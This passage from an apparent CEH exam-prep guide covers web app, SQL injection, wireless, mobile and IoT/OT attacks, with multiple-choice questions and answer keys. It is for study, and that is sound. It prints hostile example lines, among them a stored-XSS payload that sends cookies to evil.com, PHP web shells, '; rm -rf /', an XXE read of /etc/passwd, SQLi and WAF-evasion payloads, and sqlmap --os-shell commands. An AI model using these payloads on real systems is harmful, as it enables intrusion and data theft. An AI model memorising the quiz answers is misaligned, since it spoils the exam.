    Exam Focus Areas (High Yield): IDOR is a classic test topic. Also, horizontal vs vertical privilege escalation. Countermeasure: Access control checks on server side for every request, use random and unpredictable IDs, implement role-based access.

    Knowledge Check: After logging in as a regular user, an attacker changes the URL from /profile/123 to /profile/124 and sees another user's profile. This indicates:
    A) SQL injection
    B) Broken authentication
    C) Insecure Direct Object Reference
    D) CSRF
    Correct: C – Direct reference to object with no authorization check. (A not present; B authentication passed; D forces action.)

Topic: Attack Access Controls

    The 80/20 Summary: Access control enforces authorization. Weaknesses allow unauthorized access to functionality or data. Includes forced browsing (accessing pages without links) and parameter manipulation to elevate privileges.

    The Logical Breakdown: Attackers enumerate directories and files to discover unprotected admin panels (/admin, /backup). They may guess or brute-force directories. Real-world: Using Dirbuster, attacker finds /admin/config.php with no authentication.

    The Technical Toolset: Dirbuster, gobuster (gobuster dir -u http://target.com -w wordlist.txt). Burp Sequencer (session token analysis). Curl to test access.

    Exam Focus Areas (High Yield): Forced browsing is a form of broken access control. Countermeasure: Proper authentication for all sensitive pages, not hiding them. Also, use MAC/ DAC/ RBAC models.

    Knowledge Check: A web application has no link to the admin page, but the developer left the page accessible at /admin.php. An attacker discovers it via directory brute-force. This is:
    A) SQLi
    B) Forced browsing
    C) Session hijacking
    D) Phishing
    Correct: B – Discovering and accessing hidden pages without authorization. (A injection; C steals session; D social.)

Topic: Attack Session Management Mechanism

    The 80/20 Summary: Session management handles user state. Attacks: session hijacking, session fixation, weak session ID generation, and improper session termination. Attackers exploit these to impersonate users.

    The Logical Breakdown: If session IDs are predictable, an attacker can craft a valid ID. If logout doesn't invalidate the session, the attacker can reuse it. Real-world: An application uses sequential session IDs; attacker logs in, gets ID 1000, then changes to 999 to access another user's session.

    The Technical Toolset: Burp Sequencer to analyze randomness. Cookie Editor to change session ID. Ferret/Hamster for sidejacking. OWASP ZAP session token analysis.

    Exam Focus Areas (High Yield): Session ID must be long, random, and transmitted over HTTPS. Regenerate after login. Countermeasure: Use framework's session management, set cookie flags (HttpOnly, Secure, SameSite).

    Knowledge Check: A banking app uses a session cookie with value "user=John; sessionid=12345". The attacker changes sessionid to 12346 and becomes another user. What's the flaw?
    A) Weak session ID generation (predictable)
    B) SQL injection
    C) XSS
    D) CSRF
    Correct: A – Predictable session IDs allow attacker to assume other sessions. (B/C/D not.)

Topic: Perform Injection/Input Validation Attacks

    The 80/20 Summary: Injection attacks exploit flawed input handling to execute unintended commands. Includes SQL, OS command, LDAP, XML, XPath, and Server-Side Template Injection (SSTI). The attacker injects malicious syntax into an interpreter.

    The Logical Breakdown: An application passes user input directly to an interpreter (SQL, shell, etc.). If it's not sanitized, the injected code runs. Real-world: An attacker enters ; ls into a ping utility field, causing command injection and listing directory.

    The Technical Toolset: SQLMap for SQLi, Commix for command injection, Burp Intruder for fuzzing. Nmap NSE for injection checks.

    Exam Focus Areas (High Yield): Command injection: using ;, |, &&. SQL injection: ' OR 1=1 --. LDAP injection: * or admin)(&. Countermeasure: Use parameterized queries, input validation, escape special characters, least privilege for interpreter.

    Knowledge Check: A web app has a search form that runs a system command grep -i user_input file. An attacker inputs ; rm -rf /. What attack?
    A) SQL injection
    B) OS command injection
    C) XSS
    D) File inclusion
    Correct: B – The semicolon allows execution of an additional command. (A SQL; C script; D file includes.)

Topic: Attack Application Logic Flaws

    The 80/20 Summary: Logic flaws are errors in the workflow, such as purchasing items with negative quantity, bypassing payment steps, or performing actions out of intended order. These are hard to automate.

    The Logical Breakdown: An application's business logic is broken: for example, an e-commerce site allows adding unlimited items to cart and then applying a coupon that reduces total below zero, resulting in a negative total or free items. Real-world: Attacker orders 1000 items, applies a coupon code multiple times via intercepting and repeating request, gets discount cumulatively.

    The Technical Toolset: Burp Suite to tamper with sequence and data. Manual testing with creative thinking. ZAP session replay.

    Exam Focus Areas (High Yield): Logic flaws require understanding business processes. Countermeasure: Validate business rules on server, implement stateful workflows, prevent users from skipping steps.

    Knowledge Check: A travel booking site allows a user to book a flight, then change the passenger name after payment. An attacker books a cheap ticket, then changes the name to a different flight. This is an example of:
    A) SQL injection
    B) Application logic flaw
    C) CSRF
    D) XSS
    Correct: B – The logic flaw allows modification after payment in a way that violates business rules. (Others not.)

Topic: Attack Shared Environments

    The 80/20 Summary: In shared hosting, multiple websites reside on one server. Attackers compromise one site and then escalate to other sites or the server itself. Vulnerability: weak isolation, shared databases, same IP.

    The Logical Breakdown: An attacker finds a vulnerable site on a shared server, uploads a web shell, then uses it to access other sites' directories because they are all under the same user or have lax permissions. Real-world: Exploit a WordPress plugin to upload shell, then browse /home/otheruser/public_html/config.php.

    The Technical Toolset: Web shell (c99, r57). Metasploit privilege escalation to break out of jail. Cpanel brute-force.

    Exam Focus Areas (High Yield): Shared hosting risks: other tenant's insecurity becomes your risk. Countermeasure: Use virtual private server (VPS) or dedicated server, proper file permissions, and containerization.

    Knowledge Check: A website hosted on shared hosting is defaced. The attacker uploaded a shell via a vulnerability in another site on the same server. This is possible because of:
    A) SQL injection
    B) Cross-site scripting
    C) Insufficient isolation in shared hosting
    D) DNS poisoning
    Correct: C – The shared environment allowed cross-site contamination. (A/B/D different.)

Topic: Attack Database Connectivity

    The 80/20 Summary: Web apps connect to databases using connection strings. Attackers target database server credentials, weak connection encryption, or unprotected connection files. Obtaining DB credentials leads to data breach.

    The Logical Breakdown: If an application's configuration file is exposed (e.g., due to backup or incorrect permissions), an attacker can read the database password. Also, connection may be susceptible to sniffing if not TLS. Real-world: Attacker finds config.bak containing mysql://root:password@localhost/db.

    The Technical Toolset: SQLMap can connect directly if credentials known. Netcat to banner grab database (MySQL 3306). Nmap: nmap -sV -p 3306 target. Metasploit modules for database exploits.

    Exam Focus Areas (High Yield): Default ports: MySQL 3306, MSSQL 1433, Oracle 1521. Connection string injection possible. Countermeasure: Encrypt connection strings, use least privilege DB accounts, restrict DB server access, enable SSL/TLS.

    Knowledge Check: An attacker obtains the database password from a web.config file exposed via directory traversal. Which attack can now be conducted?
    A) XSS
    B) Direct database access and data exfiltration
    C) Session hijacking
    D) Phishing
    Correct: B – With credentials, direct DB access. (A/C/D irrelevant.)

Topic: Attack Web App Client

    The 80/20 Summary: Exploiting vulnerabilities on the client side: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking, HTML injection. These target the user's browser, often via the web app.

    The Logical Breakdown: Reflected XSS: attacker sends a link with malicious script; user clicks, script executes. Stored XSS: script saved on server, executed by other users. CSRF: attacker forces authenticated user to perform unwanted actions. Real-world: Stored XSS in a comment field steals cookies of all viewers.

    The Technical Toolset: XSS payloads: <script>alert(1)</script>. Burp Suite to test. XSSer, BeEF (browser exploitation). CSRF PoC generator in Burp.

    Exam Focus Areas (High Yield): Difference between stored, reflected, DOM-based XSS. CSRF requires user to be authenticated. Countermeasure: Output encoding, Content Security Policy (CSP), anti-CSRF tokens.

    Knowledge Check: An attacker posts a message on a forum containing <script>new Image().src='http://evil.com/steal?c='+document.cookie</script>. All forum visitors lose their session cookies. This is:
    A) Reflected XSS
    B) Stored XSS
    C) CSRF
    D) SQL injection
    Correct: B – The script is stored on the server and executed for every visitor. (A reflected is in URL; C forces action not script; D not.)

Topic: Attack Web Services

    The 80/20 Summary: Web services (SOAP, REST) exchange data between applications. Vulnerabilities: injection, broken authentication, and XML-related attacks (XXE, XPath injection). Attackers test API endpoints for weaknesses.

    The Logical Breakdown: Web services often use XML or JSON. An attacker may send malicious SOAP messages to trigger XXE or SQLi via the API. Real-world: A REST API doesn't properly validate access token, allowing IDOR by incrementing user ID in API call.

    The Technical Toolset: Postman to craft API requests. Burp Suite with Repeater. SoapUI for SOAP. WSDL analysis with wsdl.exe. Nmap script: http-soap-methods.

    Exam Focus Areas (High Yield): SOAP uses XML, REST uses JSON. WSDL describes SOAP services. UDDI is the discovery. Countermeasure: validate all API inputs, use OAuth for authentication, encrypt API keys.

    Knowledge Check: A web service uses SOAP and accepts XML input. An attacker includes <!ENTITY xxe SYSTEM "file:///etc/passwd"> and gets the file contents. This is:
    A) SQL injection
    B) XXE injection
    C) CSRF
    D) XSS
    Correct: B – XXE reads local files via external entity. (A SQL; C/D client-side.)

Topic: Web API, Webhooks, and Web Shell

    The 80/20 Summary: Web APIs (RESTful) expose functionality; attackers exploit insecure endpoints. Webhooks allow real-time data push; can be spoofed. A web shell is a malicious script uploaded to a server for remote command execution.

    The Logical Breakdown: Attackers discover API endpoints by guessing or through documentation. They test for broken object level authorization, mass assignment. A web shell (e.g., PHP one-liner) is planted via file upload or injection to gain backdoor access. Real-world: Attacker uploads cmd.php containing <?php system($_GET['cmd']); ?>, then accesses it to run OS commands.

    The Technical Toolset: Postman, curl for API testing. Gobuster for API endpoint discovery. Common web shells: c99, r57, Weevely (weevely generate password shell.php). Metasploit payloads.

    Exam Focus Areas (High Yield): Web shell detection by looking for suspicious PHP/ASPX files. Countermeasure: Restrict file upload types, scan uploaded files with AV, use WAF to detect shell commands.

    Knowledge Check: A defender finds a file images.php in the uploads folder containing <?php eval(base64_decode($_POST['cmd'])); ?>. What is this file?
    A) Legitimate image processor
    B) A web shell
    C) Database connector
    D) API endpoint
    Correct: B – The code executes arbitrary commands sent via POST, a typical web shell. (A not; C/D different.)

Topic: Web App Security

    The 80/20 Summary: Securing web apps involves secure coding, regular testing, patching, deploying WAF, and implementing security headers (CSP, HSTS). Defenses target each vulnerability class.

    The Logical Breakdown: Organizations use a combination of static application security testing (SAST), dynamic testing (DAST), and runtime protection (RASP). WAF filters malicious requests. Real-world: A WAF rule blocks requests containing SQL injection patterns, and the app uses parameterized queries.

    The Technical Toolset: ModSecurity (WAF). SonarQube (SAST). OWASP ZAP (DAST). Security headers: X-Content-Type-Options: nosniff, Content-Security-Policy.

    Exam Focus Areas (High Yield): Input validation is the most important defense. Also, output encoding prevents XSS. EC-Council may ask about the secure flag in cookies. Countermeasure: (this topic is the countermeasure) implement all of the above.

    Knowledge Check: Which HTTP response header instructs the browser to only communicate over HTTPS?
    A) Content-Security-Policy
    B) Strict-Transport-Security
    C) X-Frame-Options
    D) Cache-Control
    Correct: B – HSTS enforces HTTPS. (A restricts resources; C prevents clickjacking; D caching.)

Sub-Domain: SQL Injection

Topic: SQL Injection Concepts

    The 80/20 Summary: SQL injection (SQLi) injects malicious SQL code into a query to manipulate the database. Results: bypass authentication, extract data, alter data, or execute OS commands (in some DBs). It's the most critical web vulnerability.

    The Logical Breakdown: User input (e.g., in a login form or URL parameter) is concatenated directly into an SQL string without sanitization. An attacker crafts input that changes the query’s logic. Real-world: A login query SELECT * FROM users WHERE username='$user' AND password='$pass' – attacker enters admin' OR '1'='1 as username, resulting in ... WHERE username='admin' OR '1'='1' ..., always true.

    The Technical Toolset: SQLMap: sqlmap -u "http://target/page?id=1" --dbs. Manual testing with single quote (') to induce error. Burp Suite. Havij (old GUI).

    Exam Focus Areas (High Yield): Error-based, union-based, blind (boolean/time) are main types. Countermeasure: Parameterized queries (prepared statements), stored procedures, input validation, least privilege DB account.

    Knowledge Check: An attacker inputs ' OR 1=1 -- into a login form and gains access. What SQLi technique?
    A) Union-based
    B) Error-based
    C) Authentication bypass via true condition
    D) Blind SQLi
    Correct: C – The injected condition always true, bypassing authentication. (A union; B relies on errors; D blind extracts data.)

Topic: Types of SQL Injection

    The 80/20 Summary: In-band SQLi (data returned in same channel): error-based and union-based. Blind SQLi (no data in response): boolean-based and time-based. Out-of-band SQLi (different channel) uses DNS or HTTP requests.

    The Logical Breakdown: Error-based: cause DB to throw errors revealing structure. Union-based: use UNION SELECT to combine results. Boolean blind: ask true/false questions and observe response differences. Time-based: use SLEEP() to infer answers. Real-world: Blind SQLi: attacker sends id=1 AND 1=1 page loads normally, id=1 AND 1=2 page different, confirming injection.

    The Technical Toolset: SQLMap with --technique flag (B: Boolean, E: Error, U: Union, S: Stacked, T: Time). Manual payloads: ' UNION SELECT 1,2,3--. Time-based: ' WAITFOR DELAY '0:0:5'-- (MSSQL).

    Exam Focus Areas (High Yield): Blind SQLi is slower but effective when no errors or union data visible. Time-based uses SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in MSSQL. Countermeasure: proper error handling (generic error page), WAF.

    Knowledge Check: A web app does not show any database output, but an attacker injects ' AND (SELECT IF(1=1, SLEEP(5), 0))-- and the response is delayed. This is:
    A) Error-based SQLi
    B) Union-based SQLi
    C) Time-based blind SQLi
    D) Boolean blind SQLi
    Correct: C – The delay indicates successful injection. (A uses errors; B union; D uses content differences.)

Topic: SQL Injection Methodology

    The 80/20 Summary: Systematic approach: (1) Identify injectable parameters, (2) Determine database type, (3) Test injection with various techniques, (4) Extract data (enumerate tables, columns), (5) Extract data rows, (6) Possibly pivot to OS commands.

    The Logical Breakdown: Start by adding a single quote to see error. Then use Boolean conditions to confirm. Use UNION to find number of columns. Then get table names, column names, and dump data. Real-world: SQLMap automates this: sqlmap -u target --dbs then --tables -D db, then --dump -T users.

    The Technical Toolset: SQLMap (automation). Manual: Burp Repeater. ORDER BY to find number of columns. information_schema in MySQL/MSSQL to enumerate schema.

    Exam Focus Areas (High Yield): Using order by to determine column count. Union select needs same number of columns. Countermeasure: Disable detailed error messages, use whitelist input validation, parameterized queries.

    Knowledge Check: An attacker uses ?id=1 ORDER BY 10-- and gets an error, but ?id=1 ORDER BY 5-- works normally. What is concluded?
    A) The database is Oracle
    B) The query uses 5 columns
    C) The injection is blind
    D) The server is Windows
    Correct: B – ORDER BY fails when the number is higher than the column count; 5 is the max. (A not; C not; D not.)

Topic: SQL Injection Tools

    The 80/20 Summary: SQLMap is the most popular automated tool; supports many DBs and techniques. Other tools: jSQL Injection (GUI), NoSQLMap (for NoSQL), BBQSQL (blind), and manual proxy tools (Burp).

    The Logical Breakdown: SQLMap sends payloads and interprets responses, automating the extraction process. It can also execute OS commands via --os-shell if DB user has appropriate privileges. Real-world: sqlmap -u "http://site.com/view?id=1" --os-shell to get command execution.

    The Technical Toolset: SQLMap: sqlmap -u URL --current-db. jSQL: Java GUI. Burp Suite: manual exploitation. Havij (old). Mole (GUI).

    Exam Focus Areas (High Yield): EC-Council expects you to know SQLMap's flags: --dbs (list databases), --tables, --columns, --dump. Also, --os-pwn for out-of-band shell. Countermeasure: WAFs can block SQLMap's default user-agent; change with --user-agent.

    Knowledge Check: A penetration tester wants to retrieve all databases from a MySQL server using SQLMap. Which command?
    A) sqlmap -u target --dbs
    B) sqlmap -u target --tables
    C) sqlmap -u target --os-shell
    D) sqlmap -u target --passwords
    Correct: A – --dbs enumerates databases. (B for tables; C for OS shell; D for passwords.)

Topic: Evasion Techniques

    The 80/20 Summary: Bypass WAFs and filters by using encoding (URL, hex, char), comments, case variation, buffer overflow in payload, alternative syntax, and splitting. SQLMap has tamper scripts.

    The Logical Breakdown: If a WAF blocks UNION SELECT, an attacker might use UNION/**/SELECT or UnIoN SeLeCt. Char() function to avoid quotes. Real-world: Using SQLMap's --tamper=space2comment to replace spaces with comments, bypassing a filter that looks for space-separated SQL keywords.

    The Technical Toolset: SQLMap tamper scripts (--tamper=between,space2comment,charencode). Manual: SELECT * FROM users WHERE id=1 UNION%a0SELECT 1,2. Use of hex: 0x61646d696e for 'admin'.

    Exam Focus Areas (High Yield): Common evasion: URL encoding (%27 for '), double encoding, null byte (%00). Countermeasure: Normalize input before validation, use positive security model (allow only known good).

    Knowledge Check: A WAF blocks requests containing "UNION SELECT". An attacker bypasses it using /*!50000UNION*/ SELECT. This works because:
    A) It's a comment syntax that MySQL executes as SQL
    B) It triggers a buffer overflow
    C) It changes case
    D) It uses encoding
    Correct: A – /*!...*/ is a MySQL conditional comment executed by the database. (B not; C not; D not.)

Topic: SQL Injection Countermeasures

    The 80/20 Summary: Use parameterized queries (prepared statements) to separate code from data. Stored procedures with strict parameterization. Whitelist input validation, escape special characters, least privilege DB accounts, disable detailed error messages, use WAF.

    The Logical Breakdown: Prepared statement: SELECT * FROM users WHERE id=?; the DB treats parameter as data only, not code. Combined with a WAF that blocks obvious SQLi patterns, it's robust. Real-world: The developer uses PDO in PHP with $stmt->bindParam.

    The Technical Toolset: ModSecurity with SQLi rules. Programming: use ORM frameworks. Database: restrict permissions (no DROP for web user). SQL monitoring tools to detect attacks.

    Exam Focus Areas (High Yield): EC-Council emphasizes that input validation alone is not enough (because sometimes special characters are needed). Parameterized queries are the gold standard. Also, escape functions like mysql_real_escape_string can be bypassed, so prepared statements are better.

    Knowledge Check: Which defense completely prevents SQL injection by ensuring user input is never interpreted as SQL?
    A) Input validation blacklist
    B) Output encoding
    C) Parameterized queries
    D) HTTPS
    Correct: C – Parameterized queries (prepared statements) separate code from data. (A can be bypassed; B for XSS; D encrypts traffic.)

Domain 6: Wireless Network Hacking
Sub-Domain: Hacking Wireless Networks

Topic: Wireless Concepts

    5 must-know facts:

        802.11 standards: a (5 GHz, 54 Mbps), b (2.4 GHz, 11 Mbps), g (2.4 GHz, 54 Mbps), n (dual-band, MIMO), ac (5 GHz, Gigabit), ax (Wi-Fi 6).

        Wireless NIC modes: Managed (client), Master (AP), Ad-hoc, Monitor (packet capture).

        Service Set Identifier (SSID) identifies the network; can be hidden but still discoverable.

        Basic Service Set (BSS) is one AP; Extended Service Set (ESS) is multiple APs sharing same SSID.

        Channels: 2.4 GHz has 14 channels (1-11 in US), overlapping; 5 GHz has more non-overlapping channels.

    Exam trap: Hidden SSID is not a security measure; the SSID is still transmitted in probe requests/responses and can be captured. Also, MAC filtering is easily bypassed via spoofing.

    MCQ: Which 802.11 standard operates exclusively in the 5 GHz band and supports up to 1 Gbps?
    A) 802.11b, B) 802.11g, C) 802.11n, D) 802.11ac.
    Correct: D

Topic: Wireless Encryption

    5 must-know facts:

        WEP: RC4, weak IVs (24-bit), easily cracked (aircrack-ng collects IVs).

        WPA: TKIP with RC4, improves on WEP but vulnerable to dictionary attacks on PSK (crack with airolib-ng).

        WPA2: CCMP/AES, strong; vulnerability in WPS (PIN brute-force) and handshake capture + dictionary.

        WPA3: SAE (Simultaneous Authentication of Equals), protects against offline dictionary attacks.

        EAP types for enterprise: PEAP, EAP-TLS (certificate-based).

    Exam trap: WPA2 is secure, but WPS PIN (8 digits, last digit is checksum) can be cracked in hours via brute-force using tools like Reaver.

    MCQ: A wireless network uses AES encryption and requires a pre-shared key. This is:
    A) WEP, B) WPA, C) WPA2-Personal, D) WPA2-Enterprise.
    Correct: C

Topic: Wireless Threats

    5 must-know facts:

        Rogue AP: unauthorized AP connected to network, can be used for MITM.

        Evil twin: fake AP with same SSID to lure users.

        Jamming: DoS by flooding RF with noise.

        Wardriving: searching for Wi-Fi networks while moving.

        Bluejacking: sending unsolicited messages to Bluetooth devices.

    Exam trap: Evil twin attack does not require physical connection to the network; it just mimics the SSID to capture credentials.

    MCQ: An attacker sets up an AP broadcasting the same SSID as a coffee shop's free Wi-Fi. Users connect and enter passwords which are captured. This is a:
    A) Rogue AP, B) Evil twin, C) Jamming, D) Wardriving.
    Correct: B

Topic: Wireless Hacking Methodology

    5 must-know facts:

        Step 1: Discover wireless networks (netstumbler, Kismet).

        Step 2: Gain access: crack encryption (WEP, WPA) or exploit WPS.

        Step 3: Once connected, perform network scanning and attacks.

        WEP cracking: collect enough IVs (aircrack-ng).

        WPA cracking: capture 4-way handshake, then dictionary/brute-force with aircrack-ng.

    Exam trap: The 4-way handshake capture does not require disconnecting; but aireplay-ng --deauth can force a client to reconnect and capture handshake faster.

    MCQ: To crack WEP, an attacker needs to capture a large number of:
    A) Data packets with weak initialization vectors, B) Beacon frames, C) SSIDs, D) ACKs.
    Correct: A

Topic: Wireless Hacking Tools

    5 must-know facts:

        Aircrack-ng suite: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (inject), aircrack-ng (crack).

        Kismet: wireless network detector, sniffer, and IDS.

        NetStumbler: Windows, discovers networks (only for active, not monitor mode).

        Reaver: brute-forces WPS PIN.

        Wifite: automated tool for wireless attacks.

    Exam trap: Airmon-ng puts card into monitor mode (e.g., airmon-ng start wlan0). If the card doesn't support monitor mode, many tools won't work.

    MCQ: Which tool is specifically used to brute-force the WPS PIN?
    A) Aircrack-ng, B) Wireshark, C) Reaver, D) Nmap.
    Correct: C

Topic: Bluetooth Hacking

    5 must-know facts:

        Bluetooth operates at 2.4 GHz, range 10-100m depending on class.

        Bluejacking: sending unsolicited messages.

        Bluesnarfing: unauthorized access to device data (contacts, calendar).

        Bluebugging: taking control of device to make calls, send messages.

        Tools: hcitool, btscanner, BlueSmack (DoS).

    Exam trap: Bluesnarfing vs. Bluebugging: snarfing steals data; bugging gives full control.

    MCQ: An attacker connects to a phone and remotely makes calls without the owner's knowledge. This is:
    A) Bluejacking, B) Bluesnarfing, C) Bluebugging, D) Bluecasing.
    Correct: C

Topic: Wireless Attack Countermeasures

    5 must-know facts:

        Use WPA2/WPA3-Enterprise with strong passwords, disable WPS.

        Use 802.1X with RADIUS for authentication.

        Disable SSID broadcast? Not effective; instead use strong encryption.

        Enable wireless IDS/IPS to detect rogue APs.

        Keep AP firmware updated and change default credentials.

    Exam trap: Disabling SSID broadcast does not prevent hackers from discovering the network; it just doesn't appear in beacon frames but probe responses still reveal it.

    MCQ: Which is the most effective method to secure a Wi-Fi network?
    A) MAC filtering, B) Disable SSID broadcast, C) WPA2/3 with strong passphrase, D) Use static IPs.
    Correct: C

Topic: Wireless Security Tools

    5 must-know facts:

        Kismet can be used as wireless IDS to detect attacks.

        AirDefense (commercial) monitors for rogue devices.

        Wireshark with appropriate drivers can capture wireless frames.

        Aruba Networks, Cisco CleanAir for RF management.

        AirMagnet for spectrum analysis.

    Exam trap: A wireless intrusion prevention system (WIPS) can automatically block rogue APs by sending deauthentication frames.

    MCQ: Which tool can be used to detect and locate rogue access points?
    A) Aircrack-ng, B) Kismet, C) Nmap, D) Hydra.
    Correct: B

Domain 7: Mobile Platform, IoT, and OT Hacking
Sub-Domain: Hacking Mobile Platforms

Topic: Mobile Platform Attack Vectors

    Core Concept: Mobile devices are targeted via malicious apps, network-based attacks (rogue Wi-Fi), physical attacks (lost/stolen), and OS vulnerabilities. Attackers seek data theft, surveillance, or credential harvesting.

    Key Tools: Malicious APK generators (SPYNote, AndroRAT). Mobile scanning: zANTI (pen testing), Fing.

    Critical Port Numbers/Protocols: N/A (common: Wi-Fi, Bluetooth, NFC).

    Exam Trap: The biggest mobile threat is insecure app development and users granting excessive permissions. Also, jailbreaking/rooting removes security controls.

    Countermeasure: Mobile Device Management (MDM), app vetting, user education, encryption, and remote wipe.

    MCQ: An attacker creates a fake banking app and uploads it to a third-party app store. Victims install it and enter credentials. This is an example of:
    A) Phishing, B) Trojan app, C) Bluebugging, D) SIM swapping.
    Correct: B – The app masquerades as legitimate but is malicious. (A email-based; C Bluetooth; D phone number hijack.)

Topic: Hacking Android OS

    Core Concept: Android is open-source, based on Linux. Attack vectors: malware APKs, rooting, exploiting insecure app components (activities, services), and using ADB (Android Debug Bridge) over network.

    Key Tools: ADB: adb shell for remote shell. Metasploit: android/meterpreter/reverse_tcp payload. AndroRAT, DroidJack (RATs). drozer (security assessment): dz> run app.package.list.

    Critical Port Numbers/Protocols: ADB default port 5555 (TCP).

    Exam Trap: Rooting gives superuser access, bypassing security. EC-Council tests ADB exploitation: if ADB is enabled over network, adb connect IP gives shell. Also, APK reverse engineering with apktool.

    Countermeasure: Disable ADB, don't install apps from unknown sources, use Google Play Protect, keep OS updated, and use encryption.

    MCQ: An attacker uses adb connect 192.168.1.10 and gets a shell. What must be enabled on the device?
    A) Bluetooth, B) USB debugging and network ADB, C) NFC, D) Wi-Fi only.
    Correct: B – ADB over network must be enabled. (A not; C not; D not sufficient.)

Topic: Hacking iOS

    Core Concept: iOS is closed-source, but jailbreaking removes restrictions. Attacks exploit zero-days, malicious profiles, or use iCloud phishing. Tools like Cydia enable unauthorized apps.

    Key Tools: Cydia Impactor to sideload apps. Xcode to develop exploits. Needle framework (assessment). iFunbox for file access.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Jailbreaking types: tethered (requires PC to boot), semi-tethered, untethered (permanent). EC-Council may ask about the risk of installing enterprise-signed malicious apps.

    Countermeasure: Don't jailbreak, update iOS, use strong passcode, enable Find My iPhone, and use App Store only.

    MCQ: An employee jailbreaks their iPhone to install unapproved apps. What is the primary security risk?
    A) Reduced battery life, B) Bypass of iOS security sandbox and app review, C) No 5G, D) iCloud backup fails.
    Correct: B – Jailbreaking removes security restrictions, making malware installation easier. (A not primary; C false; D not.)

Topic: Mobile Device Management

    Core Concept: MDM provides centralized control over mobile devices: enforce policies, push configurations, encrypt, remote wipe, and require passcodes. It mitigates mobile threats.

    Key Tools: Microsoft Intune, VMware Workspace ONE, MobileIron, Jamf (Apple). Commands: enforce encryption, device restrictions.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: BYOD (Bring Your Own Device) policies require containerization (separate work and personal data). MDM can enforce separation and data loss prevention.

    Countermeasure: Implement MDM with strong authentication, restrict jailbroken/rooted devices, and regular compliance checks.

    MCQ: An organization allows personal devices but wants to ensure corporate data is isolated and can be remotely wiped without affecting personal data. What solution?
    A) Firewall, B) MDM with containerization, C) Antivirus, D) VPN.
    Correct: B – MDM with containerization creates a work profile. (A/C/D not for data separation.)

Topic: Mobile Security Guidelines and Tools

    Core Concept: Guidelines: OWASP Mobile Top 10, NIST standards. Tools: MobSF (static analysis), Frida (dynamic instrumentation), zANTI (network testing), AndroBugs (vulnerability scanner).

    Key Tools: MobSF: mobsf.py upload APK. Frida: frida -U -f com.app.name. zANTI runs on Android. AndroBugs: androguards.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: OWASP Mobile Top 10 includes improper platform usage, insecure data storage, insecure communication, insecure authentication, insufficient cryptography, etc.

    Countermeasure: Follow secure coding practices, test apps with static and dynamic analysis, use encrypted storage, and implement certificate pinning.

    MCQ: A mobile app stores user passwords in plaintext in the shared preferences file. Which OWASP Mobile category does this fall under?
    A) Insecure communication, B) Insecure data storage, C) Weak server-side controls, D) Client code quality.
    Correct: B – Plaintext sensitive data storage. (A for network; C/D not.)

Sub-Domain: IoT and OT Hacking

Topic: IoT Concepts

    5 must-know facts:

        IoT (Internet of Things) connects physical devices to internet: sensors, wearables, smart appliances.

        Communication protocols: MQTT, CoAP, Zigbee, Z-Wave, BLE.

        IoT architecture: Perception (sensors), Network, Middleware, Application layers.

        Most IoT devices lack security due to limited processing power and default credentials.

        OWASP IoT Top 10 lists vulnerabilities like weak/default passwords, insecure network services.

    Exam trap: Many IoT devices ship with hardcoded credentials that cannot be changed, making them prime targets for Mirai-like botnets.

    MCQ: Which protocol is a lightweight publish-subscribe messaging protocol designed for constrained devices?
    A) HTTP, B) MQTT, C) FTP, D) SSH.
    Correct: B

Topic: IoT Attacks

    5 must-know facts:

        Firmware extraction and analysis to find backdoors or hardcoded keys.

        Exploiting insecure web interface or API.

        Sniffing unencrypted communication (Zigbee, BLE).

        Side-channel attacks (power analysis) to extract keys.

        Physical tampering (JTAG, UART) to dump firmware.

    Exam trap: Firmware attacks often involve using tools like binwalk to extract filesystem and find sensitive files (e.g., /etc/shadow).

    MCQ: An attacker uses a serial interface on an IoT device to access the bootloader and extract firmware. This is:
    A) XSS, B) Physical hardware hacking via JTAG/UART, C) SQL injection, D) Phishing.
    Correct: B

Topic: IoT Hacking Methodology

    5 must-know facts:

        Step 1: Information gathering – identify device, services, ports (Nmap, Shodan).

        Step 2: Vulnerability scanning – search for known CVEs.

        Step 3: Exploitation – web interface attacks, default credentials, or buffer overflow.

        Step 4: Post-exploitation – maintain persistence, spread to other devices.

        Tools: Shodan, Nmap, Firmwalker, Attify Badge (hardware).

    Exam trap: Shodan can find exposed IoT devices (e.g., MQTT brokers, cameras) with default credentials.

    MCQ: A security researcher uses Shodan to search for “port:1883” and finds many open MQTT brokers. This is part of which phase?
    A) Exploitation, B) Information gathering, C) Post-exploitation, D) Clearing logs.
    Correct: B

Topic: IoT Attack Countermeasures

    5 must-know facts:

        Change default credentials, disable unnecessary services.

        Use strong encryption for communication (TLS for MQTT).

        Regularly update firmware, enable secure boot.

        Network segmentation – isolate IoT devices on separate VLAN.

        Implement IoT security frameworks (NIST, IoTSF).

    Exam trap: A common mistake is connecting IoT devices to the main corporate network; instead, use a separate VLAN with strict firewall rules.

    MCQ: What is the most effective way to prevent an attacker from brute-forcing the password of an IoT device’s admin panel?
    A) Use MQTT, B) Change default password and implement account lockout, C) Disable Wi-Fi, D) Hide the device.
    Correct: B

Topic: OT Concepts

    5 must-know facts:

        OT (Operational Technology) controls physical processes: SCADA, ICS, PLCs, DCS.

        Purdue model layers: Enterprise (IT) and Industrial (OT) zones, DMZ in between.

        Protocols: Modbus, DNP3, Profinet, OPC, Ethernet/IP.

        OT systems prioritize availability and integrity over confidentiality.

        IT/OT convergence increases attack surface.

    Exam trap: OT systems often cannot be patched frequently due to uptime requirements, making them vulnerable. Also, the Stuxnet attack targeted Siemens PLCs.

    MCQ: Which protocol is commonly used in SCADA systems for communication between master and remote terminal units?
    A) HTTP, B) Modbus, C) SMTP, D) DNS.
    Correct: B

Topic: OT Attacks

    5 must-know facts:

        Stuxnet worm targeted Iranian nuclear centrifuges via Siemens S7 PLCs.

        Crashoverride/Industroyer disrupted Ukraine's power grid using ICS protocols.

        Attacks often start in IT network, pivot to OT via DMZ.

        HMI (Human-Machine Interface) compromise allows altering setpoints.

        PLC logic injection can cause physical destruction.

    Exam trap: Stuxnet used four zero-days and spread via USB; it altered the speed of centrifuges while reporting normal values to HMI.

    MCQ: What was the primary delivery method of the Stuxnet worm into the air-gapped Natanz facility?
    A) Phishing email, B) Infected USB drives, C) SQL injection, D) RDP brute-force.
    Correct: B

Topic: OT Hacking Methodology

    5 must-know facts:

